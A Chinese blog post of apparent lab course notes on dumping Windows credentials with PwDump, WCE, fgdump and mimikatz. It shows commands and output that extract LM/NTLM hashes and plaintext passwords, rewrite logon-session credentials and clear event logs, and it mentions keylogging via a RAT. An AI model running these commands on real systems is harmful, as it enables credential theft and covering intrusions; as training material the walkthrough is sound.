Kali Linux渗透测试 045 读取windows本地密码

版权声明:本文为博主原创连载文章,为了内容连贯性,未经博主允许不得转载。 https://blog.csdn.net/Kevinhanser/article/details/79407338

本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程

  1. 抓包嗅探
  2. 键盘记录本地密码
  3. 查看本地缓存密码
  4. WCE (WINDOWS CREDENTIAL EDITOR)
  5. fgdump
  6. mimikatz

###1. 抓包嗅探###


  1. Windows

    • Wireshark
    • Omnipeek
    • Commview
    • Sniffpass:抓取密码相关的数据包
  2. Linux

    • Tcpdump
    • Wireshark
    • Dsniff:抓取密码相关的数据包

###2. 键盘记录本地密码###


  • 可以使用木马软件 DarkCometRAT

    在控制目标主机之后可以监控键盘记录信息

###3. 查看本地缓存密码###


  1. 在浏览器查看缓存密码

    在这里插入图片描述

  2. windows 密码恢复工具

    Windows Password Recovery Tools

  3. 使用 Pwdump 查看 windows 本地登录密码

    • windows 登录密码保存在 C:\Windows\System32\config\SAM 文件中

    • Pwdump 在 kali 系统中可以找到 /usr/share/windows-binaries/fgdump/

    • 添加用户

        C:\Documents and Settings\kevin>net user user2 123456 /add
        C:\Documents and Settings\kevin>net user
        	\\ICST-WINATT 的用户帐户
        	-------------------------------------------------------------
        	Administrator            Guest                    HelpAssistant
        	kevin                    SUPPORT_388945a0         test
        	user1                    user2
        C:\Documents and Settings\kevin>cd \
        C:\>PwDump.exe localhost
        	Administrator:500:18D583B495C4696AFF17365FAF1FFE89:5D36F0CA14EEBEF32F55C7B6A4675DB0:::
        	Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
        	HelpAssistant:1000:5906F3A72959D5902440275BA555A537:10AA20D63C3EC71E0102AC95ADF6DF73:::
        	kevin:1004:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
        	SUPPORT_388945a0:1002:NO PASSWORD*********************:8AFA81401E8D8EBFA42B4E46F6507C07:::
        	test:1005:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
        	user1:1006:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
        	user2:1007:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::Completed.
        # 结果:前部分是 LMHASH ,后部分是 NTLMHASH
      
    • 可以将结果保存在文件中,然后在 kali 中进行破解

      在这里插入图片描述

###4. WCE (WINDOWS CREDENTIAL EDITOR)###


  1. WINDOWS身份认证过程

    在这里插入图片描述

  2. WCE (WINDOWS CREDENTIAL EDITOR)

    • windows 内核中保存有密码明文副本,安全机制较低

    • 需要管理员权限

    • 工具保持在 kali 的 /usr/share/wce/wce-universal # 通用格式是自动识别32位和64位

    • 多用户登录目标主机

      在这里插入图片描述

    • 列举登录账号及会话

        C:\>wce-universal.exe -lv
        	0020B19D:user1:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
        	001E5D92:user2:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
        	001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
        	0000C7CE:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
        	000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
        	# 与 C:\>PwDump.exe localhost 结果相同
      
    • 每隔5秒刷新一次

      C:>wce-universal.exe -r

    • 删除登录会话

        C:\>wce-universal.exe -d 0020B19D
        C:\>wce-universal.exe -lv
        	001E5D92:user2:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
        	001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
        	0000C7CE:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
        	000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
      
    • 计算密码对应的 HASH 值

        C:\>wce-universal.exe -g passwd
        	Password:   passwd
        	Hashes:     91C7AE7122196B5EAAD3B435B51404EE:22315D6ED1A7D5F8A7C98C40E9FA2DEC
      
    • 读取内核中的明文密码

        C:\>wce-universal.exe -w
        	user1\ICST-WINATT:123456
        	user2\ICST-WINATT:123456
        	test\ICST-WINATT:123456
        	kevin\ICST-WINATT:123456
        	NETWORK SERVICE\MSHOME:
        
        C:\>net user user1 111222
        	命令成功完成。
        C:\>wce-universal.exe -w
        	user1\ICST-WINATT:123456
        	user2\ICST-WINATT:123456
        	test\ICST-WINATT:123456
        	kevin\ICST-WINATT:123456
        	NETWORK SERVICE\MSHOME:
        # 当前内核中保存的值会在下次登录被读取出来
      
    • 对 LUID 进行修改(将LUID改为匹配其他用户的用户名和密码)

        C:\>wce-universal.exe -lv
        	001E5D92:user2:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
        	001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
        	0000C7CE:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
        	000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
        C:\>wce-universal.exe -i 001E5D92 -s kevin:ICST-	WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
        	Changing NTLM credentials of logon session 001E5D92h to:
        	Username: kevin
        	domain: ICST-WINATT
        	LMHash: 44EFCE164AB921CAAAD3B435B51404EE
        	NTHash: 32ED87BDB5FDC5E9CBA88547376818D4
        	NTLM credentials successfully changed!
        C:\>wce-universal.exe -lv
        	001E5D92:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
        	001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
        	000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
      
    • Win7 及 之前默认 都可遭受 WCE 攻击

      防范方法:修改注册表

        HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages
      

      删除 wdigest 之后重启计算机

      在这里插入图片描述

###5. fgdump ###


  1. PwDump localhost

    位置:Pwdump 在 kali 系统中可以找到 /usr/share/windows-binaries/fgdump/

  2. fgdump

    位置:Pwdump 在 kali 系统中可以找到 /usr/share/windows-binaries/fgdump/
    放在 WinXP 中, 双击或在命令行执行 fgdump.exe 会自动生成三个文件,文件中保存着密码

    在这里插入图片描述

###6. mimikatz ###


  • 在 kali 中的路径 /usr/share/mimikatz,将 win32 复制到 windows 主机

      C:\Win32>mimikatz.exe
      查看帮助是::
      mimikatz # ::
      	        standard  -  Standard module  [Basic commands (does not require module name)]
      	          crypto  -  Crypto Module
      	        sekurlsa  -  SekurLSA module  [Some commands to enumerate credentials...]
      	        kerberos  -  Kerberos package module  []
      	       privilege  -  Privilege module
      	         process  -  Process module
      	         service  -  Service module
      	         lsadump  -  LsaDump module
      	              ts  -  Terminal Server module
      	           event  -  Event module
      	            misc  -  Miscellaneous module
      	           token  -  Token manipulation module
      	           vault  -  Windows Vault/Credential module
      	     minesweeper  -  MineSweeper module
      	             net  -
      	           dpapi  -  DPAPI Module (by API or RAW access)  [Data Protection application programming interface]
      	       busylight  -  BusyLight Module
      	          sysenv  -  System Environment Value module
      	             sid  -  Security Identifiers module
      	             iis  -  IIS XML Config module
      	             rpc  -  RPC control of mimikatz			
      mimikatz # privilege::
      			Module :        privilege
      			Full name :     Privilege module
      	
      	           debug  -  Ask debug privilege            * *
      	          driver  -  Ask load driver privilege
      	        security  -  Ask security privilege
      	             tcb  -  Ask tcb privilege
      	          backup  -  Ask backup privilege
      	         restore  -  Ask restore privilege
      	          sysenv  -  Ask system environment privilege
      	              id  -  Ask a privilege by its id
      	            name  -  Ask a privilege by its name
      mimikatz # privilege::debug
      mimikatz # sekurlsa::
      mimikatz # sekurlsa::logonPasswords
      mimikatz # sekurlsa::wdigest
      mimikatz # process::list
      mimikatz # lsadump::sam
      mimikatz # lsadump::cache
      mimikatz # ts::multirdp
      mimikatz # event::clear
      mimikatz # event::drop
      mimikatz # misc::regedit
      mimikatz # token::whoami
    
展开阅读全文

没有更多推荐了,返回首页